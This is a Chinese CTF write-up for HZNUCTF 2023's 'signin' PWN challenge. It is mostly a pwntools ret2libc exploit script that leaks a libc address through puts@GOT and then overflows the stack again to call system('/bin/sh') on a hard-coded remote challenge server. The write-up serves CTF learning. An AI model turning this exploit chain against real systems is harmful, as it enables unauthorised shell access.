
[HZNUCTF 2023 preliminary]signin xshhc的WriteUp

2023-04-06 10:59By
xshhc
PWN栈溢出

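标准的 ret2libc：第一次溢出调用 puts 打印 puts 的 GOT 表项来泄露 libc 地址并返回 main，算出 libc 基址后，第二次溢出调用 system("/bin/sh")。脚本中的地址都是写死的，说明题目程序应未开启 PIE 和栈保护（canary）。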

from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *

def s(a):
    """Send the bytes ``a`` on the global tube ``p`` exactly as given."""
    p.send(a)
def sa(a, b):
    """Wait until ``a`` has been received on ``p``, then send ``b``.

    Thin wrapper over ``p.sendafter``; the received data is discarded.
    """
    p.sendafter(a, b)
def sl(a):
    """Send ``a`` on the global tube ``p`` via ``p.sendline``."""
    p.sendline(a)
def sla(a, b):
    """Wait until ``a`` has been received on ``p``, then send ``b`` as a line.

    Thin wrapper over ``p.sendlineafter``; the received data is discarded.
    """
    p.sendlineafter(a, b)
def r():
    """Return whatever ``p.recv()`` yields from the global tube ``p``."""
    data = p.recv()
    return data
def pr():
    """Receive once from the global tube ``p`` and print the result."""
    chunk = p.recv()
    print(chunk)
def rl(a):
    """Receive from ``p`` up to and including the delimiter ``a``.

    Despite the name this wraps ``p.recvuntil``, not ``recvline``.
    """
    received = p.recvuntil(a)
    return received
def inter():
    """Hand the global tube ``p`` over to the terminal via ``p.interactive()``."""
    p.interactive()
def debug():
    """Attach gdb to the global tube ``p`` and pause the script."""
    gdb.attach(p)
    # pause() leaves time to set breakpoints before the script continues
    pause()
def get_addr():
    """Read from ``p`` up to a 0x7f byte and decode the trailing bytes as an integer.

    The last six bytes received (the final one being 0x7f) are padded
    with zero bytes to a length of eight and unpacked with ``u64``.
    """
    received = p.recvuntil(b'\x7f')
    # presumably a 48-bit user-space pointer whose top byte is 0x7f;
    # any earlier 0x7f byte in the stream would end the read early
    low_six = received[-6:]
    padded = low_six.ljust(8, b'\x00')
    return u64(padded)
def get_sb():
    """Return ``(system_addr, binsh_addr)`` rebased onto the global ``libc_base``.

    Both values are offsets looked up in the global ``libc`` ELF object
    and added to ``libc_base``, which must be set before calling.
    """
    system_addr = libc_base + libc.sym['system']
    # first occurrence of the NUL-terminated string inside the libc image
    binsh_offset = next(libc.search(b'/bin/sh\x00'))
    return system_addr, libc_base + binsh_offset
def csu(rdi, rsi, rdx, rip, gadget):
    """Pack eight 64-bit words with ``p64`` and return them concatenated.

    Word order: ``gadget``, 0, 1, ``rip``, ``rdi``, ``rsi``, ``rdx``,
    ``gadget - 0x1a``.

    NOTE(review): the name and layout suggest the ``__libc_csu_init``
    gadget pair; this helper is never called in the script shown here.
    """
    words = (gadget, 0, 1, rip, rdi, rsi, rdx, gadget - 0x1a)
    return b''.join(p64(word) for word in words)

# Two-stage ret2libc against ./pwn: leak a libc address, then call system.
# NOTE(review): the fixed 0x40xxxx addresses and the plain 0x48-byte
# overwrite only hold if ./pwn is built without PIE and without a stack
# canary; confirm with checksec. Enabling both, and bounding the read,
# is what breaks this chain.

# Target is 64-bit Linux; log_level='debug' makes pwntools log all traffic.
context(os='linux', arch='amd64', log_level='debug')
# Local run, disabled in favour of the remote challenge instance below.
#p = process('./pwn')
p = remote('43.143.7.127', 28969)
elf = ELF('./pwn')
# Earlier attempt with a 2.27 i386 libc, left disabled.
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
# Author-local copy of glibc 2.31-0ubuntu9.9 (amd64). The offsets used
# below are only right if the remote runs this exact build; TODO confirm.
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')

# Hard-coded addresses inside ./pwn. Presumably `pop rdi; ret` and a bare
# `ret`, judging by the names and how they are used; verify in the binary.
rdi = 0x401283
ret = 0x401219

# Stage 1: after the 'here~\n' prompt, send 0x48 filler bytes followed by a
# chain that calls puts(puts@got) and then re-enters main for a second pass.
sa(b'here~\n', b'a'*0x48 + p64(rdi) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(elf.sym['main']))
# Leaked runtime address of puts minus its offset in libc gives the base.
libc_base = get_addr() - libc.sym['puts']
#gdb.attach(p, 'b *0x401219')

# Stage 2: same overflow, now calling system(binsh). The extra `ret` ahead
# of the chain is presumably for 16-byte stack alignment; TODO confirm.
system, binsh = get_sb()
sa(b'here~\n', b'a'*0x48 + p64(ret) + p64(rdi) + p64(binsh) + p64(system))

# Hand the connection over to the terminal.
inter()

  
© 著作权归作者所有
